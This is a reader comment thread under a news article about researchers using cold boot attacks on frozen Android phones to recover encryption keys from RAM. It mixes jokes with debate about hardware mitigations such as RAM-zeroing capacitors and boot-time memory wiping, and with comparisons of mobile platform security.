back to article Boffins FREEZE PHONES to crack Android on-device crypto

Computer scientists at the Friedrich-Alexander University of Erlangen-Nuremberg, Germany (FAU) have demonstrated that it is possible for unauthorized parties to recover data from encrypted Android smartphones using cold boot attacks. And when they say cold, they mean it – below 10°C, to be precise. Android has included built-in …

COMMENTS

This topic is closed for new posts.

Page:

Coat

cool!

*groan*

5
1
Unhappy

Damn!

Beat me to it.

0
1
Bronze badge

ha

Icy what you did there.

10
0

Actually looking forward...

...to Eadons comment on this! ;D

2
2
Joke

Re: Actually looking forward...

"Close Windows so it doesn't get so cold" maybe?

4
0

"It's so cold in here I'm freezing my AES off"

6
0
Silver badge
Coat

Forgotten your pin?

Just chill.

1
0

This post has been deleted by its author

Trollface

Does it only work with ICE-cream sandwich?

5
0
Facepalm

ICE cream is always better cold

0
0

if the phone is on and the ecryption key in ram

why the need to dick about?

1
0

Re: if the phone is on and the ecryption key in ram

Because the OS does not allow you to read that information from RAM, so they need to start another OS (the frosty one) that does allow it, without losing the information available in RAM.

0
0

Re: if the phone is on and the ecryption key in ram

... or the phone could be locked or ....

0
0
Bronze badge

Re: if the phone is on and the ecryption key in ram

Well, probably because it all sounded so.... "kewlllll".

But, I thought this would be more like a "chill, peel", as in freezing the phone, and then peeling back the layers of an encryption chip or component. Interesting article... Umm, I meant "kewl" article...

0
0
Silver badge

capacitor-based overwrite

I've always wondered why devices don't include capacitors that can power them down sensibly in the few seconds after power failure. We were always warned about suddenly depowering HDDs, but I never understood why they couldn't contain a component holding enough charge to flush the cache and park the head. And in this case, a small capacitor on the mainboard, or in the RAM module, could zero the volatile memory in a few seconds.

0
0
FAIL

Re: capacitor-based overwrite

What size of capacitor do you think would be required?

Let's take a typical mobile phone.

Battery supplies 3.5V.

Phone draws (very roughly) 0.125A

If you want to keep the phone alive for 2 seconds to allow an orderly shutdown (which, for some phones, is WAY too short a time - try it!) then the size of capacitor you need is

Capacitor = (0.125 * 2) / 3.5

= 0.071F

(It's actually way more than that because after 2 seconds the capacitor would be empty, but let's go with this figure for now).

So, that's a 71mF capacitor (or a 71,000uF capacitor, given the a re usually specified in uF or pF).

You might get away with 2 x 47,000uF capacitors in parallel.

And you want to fit that inside your mobile phone?

Good luck cramming those 2 capacitors, each 3cm in diameter and 5cm in length, into your tiny phone, John!

2
4
Anonymous Coward

Re: capacitor-based overwrite

Actually super capacitors are pretty common place these days. You can get Farad range caps no problems. If youb want to go to the extreme then look no further than KERRS in F1 cars - they use capacitors to store electricity, and they get 80hp out of them.

I remember seeing a pocket radio that had a supercap instead of a battery. If they keep improving them then we may end up using supercaps instead of batteries in phones too.

3
1
Silver badge

Re: capacitor-based overwrite

Indeed. Take a look at RS's website:

http://uk.rs-online.com/web/p/electric-double-layer-capacitors/7116985/

3
1
Bronze badge

Re: capacitor-based overwrite

All that is probably needed to stop that working is a little more sophistication than 'whipping the battery out and in as quick as possible'. Just holding the CPU in reset or even shorting the power rail to 0V as the supply is pulled will discharge the capacitor and stop the CPU from doing the zeroing of memory.

It adds an extra layer of protection that needs defeating but won't make a phone secure against attack. And if an attacker is after the information (rather than just fishing) they will probably be prepared to put that effort in. In fact there are almost certainly other ways to attack the phone and get a memory dump without having to freeze it so, while it's a novel attack vector, it's far from the only one.

2
0
Silver badge
Boffin

Re: capacitor-based overwrite

IIRC higher security devices like HSMs do have something like this implemented. It doesn't just activate on power-down, it will also be triggered if someone opens the box; that's why those devices have a higher FIPS 140-2 cert than regular mobile devices.

But then HSMs are 1U rack devices, not sure if that mechanism is small enough to fit inside a phone...

1
0
FAIL

Re: capacitor-based overwrite

And good luck fitting 2 or more of THOSE into your slim smartphone...

0
1
Silver badge

Small capacitors exist

Intel 320 SSDs include six 470µF capacitors to write the contents of RAM to flash (unwritten user data isn't stored in RAM, but the FTL maps are) They have pretty much the same size/volume as a mobile phone, so if they fit in the SSD they can fit in a phone.

However, you don't need to do that. Just have a really tiny built in battery alongside the main removable (well in most, but not all Android phones) battery. So that if the main battery drains or is removed there is still the tiny secondary battery to do whatever is necessary for a clean shutdown.

Best of all, always zero out the RAM first thing in the boot process. I assume Android probably does this, but the use of the "fast boot" probably skips that step. Don't skip that step and make your fast boot a little slower, and this attack will be thwarted.

Of course, anyone who has your phone in their possession can freeze it and disassemble it to remove the RAM chips and read them. Not exactly a "do at home" task, so while this wouldn't allow a jealous husband to read his wife's texts, it would allow a corporate spy to snag the competition's secrets.

Unless a phone is built to be tamper proof, which AFAIK no consumer phones are, the RAM removal attack will work for any OS - assuming you can figure out where in RAM the encryption key is kept. That will be easier on Android since you have source than it would be on closed source operating systems like iOS, WP8 or BB. But once you find it, it will presumably be simple to find again on other phones of the same make. ASLR may mean the high bits are different every time, but it will be in the same location on the page each time with the same stuff around it.

0
0
Bronze badge

Re: capacitor-based overwrite

Is there any utility capability in these batteries for Boeing? Sounds like Boeing could string a dozen or so of these along the lower bay and have them power all sorts of things... Maybe they coud even be under a membrane on the skin of the fuselage so if they cause problems, just do a fly-by-wire yank and jettison the cap. Or, if it is not self-fueling, self-consuming, just kill the wire feeds.

0
1
Thumb Up

Re: capacitor-based overwrite

you are right... and this is how govt agencies survive... move your sight across other similar things not being improved.

Fake passports: there can be 101 ways to further improve but it will stop CIA and like to move around a litle more difficultly.

Nikon D4s: no wehere to be seen yet cuz at 204,8000 ISO .... U.S night visions companies will start to starve.

0
2
Silver badge

Re: capacitor-based overwrite

That would complicate the process, but there would be other ways to ensure abrubt powerdown and reset. Open case and short pins, perhaps. Or magnetic pulse - I've done that to a mobile before while using it to film a can-crusher I built.

0
0
Anonymous Coward

Re: capacitor-based overwrite

Or don't store the keys in the DRAM.

Sacrificing some register space (of which an ARM has plenty) would be one way to mitigate this sort of thing.

0
0

Re: capacitor-based overwrite

The zeroing of RAM wouldn't be the CPUs responsibility.

It should be lower level than that. Ideally it'd be on the RAM packaging itself, or directly on the memory bus.

0
0

Re: capacitor-based overwrite

Well the idea is not bad, if the capacitors would sitt in ram, it would be easy to manufacture ram that on power-cut would zero it's own content memory. No need to power up the whole phone for that task.

And if you don't want to build that feature into the ram chips, then make a small battery that can do it. However the zeroing of the ram chips should not be a OS feature.

If you want to be completely secure you build this as a hardware feature onto the ram chips.

0
1
Anonymous Coward

Re: capacitor-based overwrite

You don't need enough power to run the device, only enough power to zero the RAM.

The case should have a tamper switch that would trigger it.

In software you could also define other triggers such as extreme temperature (and provide override functionality if desired).

0
0
Silver badge

Re: Small capacitors exist

Of course, anyone who has your phone in their possession can freeze it and disassemble it to remove the RAM chips and read them. Not exactly a "do at home" task, so while this wouldn't allow a jealous husband to read his wife's texts, it would allow a corporate spy to snag the competition's secrets.

I don't know - disassembling a phone could well be an at-home task for many folks. I've never tried taking apart a modern smartphone, but I've done plenty of workbench PCB mods on consumer devices in my day. Phones are smaller, with smaller feature sizes and surface-mount components and other complications, but I don't see why you couldn't have the necessary equipment at home. Nothing excessively expensive, bulky, power-consuming, sensitive, etc is required, as far as I can tell.

That said, though, changing the phone design so that the attack is difficult to mount without disassembly does increase the work factor significantly, and it removes the currently-plausible scenario of an undetected attack - where the attacker steals the phone, gains access, copies data and/or installs malware, and returns the phone with the victim none the wiser.

0
0
Anonymous Coward

"Why don't business use Android instead of Blackberry or iOS devices"......

Now you know why. That said, Blackberry devices are more secure the iOS, but BB10 is an unknown quantity.

2
2
Anonymous Coward

Are you for real?

Do you even vaguely know how badly broken ios and blackberry security is?

3
3
Silver badge
Boffin

Re: Are you for real?

iOS is broken, indeed.

But Blackberry (both OSen) actually have FIPS 140-2 certifications, something that none of the other OSen have achieved, not even Winbugs Phone 7/8.

FWIW I have never even seen BB jailbreaks being available...

1
2
Anonymous Coward

And this same attack vector

wouldn't work on Blackberry or iOS devices because...?

0
0
FAIL

Re: Are you for real?

Which goes to show how laughable FIPs is.

There's very little protection on BB from malicious apps. For instance apps can even inject keypresses. So, one bad app and "all your data are ours". The only reason that BB is used safely, is that they tend to be locked down by the company IT department.

-Mook

0
0
Silver badge
Boffin

Re: Are you for real? @Mookster

"There's very little protection on BB from malicious apps. For instance apps can even inject keypresses."

All those actions require the permissions to do so being granted by the user. You can actually block apps from doing such things by setting an explicit Deny on those ops, having a granular security model allows BB to do that.

iOS, as far as I remember, *doesn't* have that granular security, thus the iMob (?) apps were able to grab personal info and send it to the devs. Android might have those safeguards, being based on lookalike-Java; BB has that security model because of Java. I do wonder if they kept it for BB10, though...

0
0
Silver badge

Re: Are you for real?

Does anyone *want* a BB jailbreak?

0
0

Re: Are you for real?

Well less broken than android security.

That doesn't mean iOS or Blackberry would be secure.

0
1
Bronze badge

Re: Are you for real?

FYI - Windows Phone 8 is designed to be FIPS 140-2 compliant and uis currently undergoing certification.

0
1
Happy

Re: And this same attack vector

you ever tried taking out a battery on an iPhone, quickly or otherwise?

0
0
Thumb Down

Cold Boot Attack ?

So somebody repeated the cold boot attack from 5 years ago on a mobile phone?

http://www.engadget.com/2008/02/21/cold-boot-disk-encryption-attack-is-shockingly-effective/

2
0
Silver badge

Re: Cold Boot Attack ?

So somebody repeated the cold boot attack from 5 years ago on a mobile phone?

Yes. What's interesting here is:

- Demonstrating it on a mobile phone

- The fact that mobile phones are, er, mobile, which makes it easier to grab a phone and carry the attack out at your leisure (and makes it easier to fit in your freezer, for that matter)

- The FROST software, which goes a long way to automating the attack; this is nearly at script-kiddie level of simplicity

This is how security research works. When Matsui invented linear cryptanalysis and demonstrated it against DES, everyone didn't just say "oh, that's nice", and then forget about it. They tried attacking other block ciphers with LC. When AlephOne wrote "Smashing the stack for fun and profit", people went out and conducted a whole bunch of stack-smashing attacks to see what was vulnerable and refine the technique. Just because an idea's been published once doesn't mean there's no benefit in extending it to another target.

0
0

will be easy to neuter but not for existing phones

If future bootloader versions randomise RAM on startup this exploit vanishes. Won't help current devices though.

I've always said, if they get physical possession of the device assume your data can be read. This is just one way to do it without dismantling the phone. Does appear that drive encryption is still effective with the default locked bootloader. Unlock it and you should know the device is compromised, you unlock to hack them after all.

0
0
Silver badge

Re: will be easy to neuter but not for existing phones

Won't the memory map need to be in memory to access the randomized memory?

0
0

Re: will be easy to neuter but not for existing phones

The bootloader has write access to RAM and the mapping hardware or it couldn't load anything. Trivial to overwrite RAM from it.

0
0
Gold badge
Coat

Clearly this sheds a Muller light on you Android phone data.

I'll just get my heavily insulated coat for a trip to the freezer.

0
1

Firmware Flush

Its usually common practice to reset the device in to a known state, forcing all registers to default values. Surprised they didn't flush the RAM with zeros in firmware when powered on.

Soruce: I work as an embedded engineer and design ASIC/FPGA switching fabrics

2
0

designed to extract encrypted data from RAM

Is the data encrypted in RAM as well as in flash or should that read "encryption data"?

0
0
Thumb Up

I remember seeing the effects of remanence on older graphics cards.

Booting Windows 98 you'd sometimes see a flash of your desktop before restart when the screen mode changed for the bootup screen.

0
0
FAIL

Only for rooted phones

Before you can load a custom recovery your phone has to be rooted. A lot of phones can't be routed, others like HTC only let you root it once it's defaulted the phone.

So what % of phones have a data worth getting & are rooted?

1
1

Page:

This topic is closed for new posts.

Forums